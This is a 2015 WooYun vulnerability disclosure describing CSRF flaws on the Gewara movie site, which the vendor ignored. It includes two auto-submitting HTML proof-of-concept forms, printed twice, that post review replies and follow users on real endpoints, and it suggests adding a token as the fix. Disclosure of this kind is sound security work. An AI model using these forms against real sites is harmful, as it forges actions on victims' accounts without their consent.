当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127683

漏洞标题:格瓦拉生活网多处CSRF可刷粉,发影评及回复

相关厂商:格瓦拉生活网

漏洞作者: geegirl

提交时间:2015-07-20 11:43

修复时间:2015-07-25 11:44

公开时间:2015-07-25 11:44

漏洞类型:CSRF

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

稍微有些影响

详细说明:

影评发布及回复,个人信息修改,关注都可CSRF,
就以回复和关注为例子
回复:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>this is a crsf test</title>
</head>
<body>
<form action="http://www.gewara.com/activity/ajax/sns/replyComment.xhtml" method="Post">
<input type="hidden" name="body" value="test" />//内容
<input type="hidden" name="commentid" value="93796763" />影评id
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html


成功

21.png


22.png


关注

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>this is a crsf test</title>
</head>
<body>
<form action="http://www.gewara.com/activity/community/ajax/addAttention.xhtml" method="Post">
<input type="hidden" name="attentionid" value="46343616" />//被关注用户id
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>


粉丝+1

23.png

漏洞证明:

影评发布及回复,个人信息修改,关注都可CSRF,
就以回复和关注为例子
回复:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>this is a crsf test</title>
</head>
<body>
<form action="http://www.gewara.com/activity/ajax/sns/replyComment.xhtml" method="Post">
<input type="hidden" name="body" value="test" />//内容
<input type="hidden" name="commentid" value="93796763" />影评id
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html


成功

21.png


22.png


关注

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>this is a crsf test</title>
</head>
<body>
<form action="http://www.gewara.com/activity/community/ajax/addAttention.xhtml" method="Post">
<input type="hidden" name="attentionid" value="46343616" />//被关注用户id
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>


粉丝+1

23.png

修复方案:

加个token

版权声明:转载请注明来源 geegirl@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-25 11:44

厂商回复:

最新状态:

暂无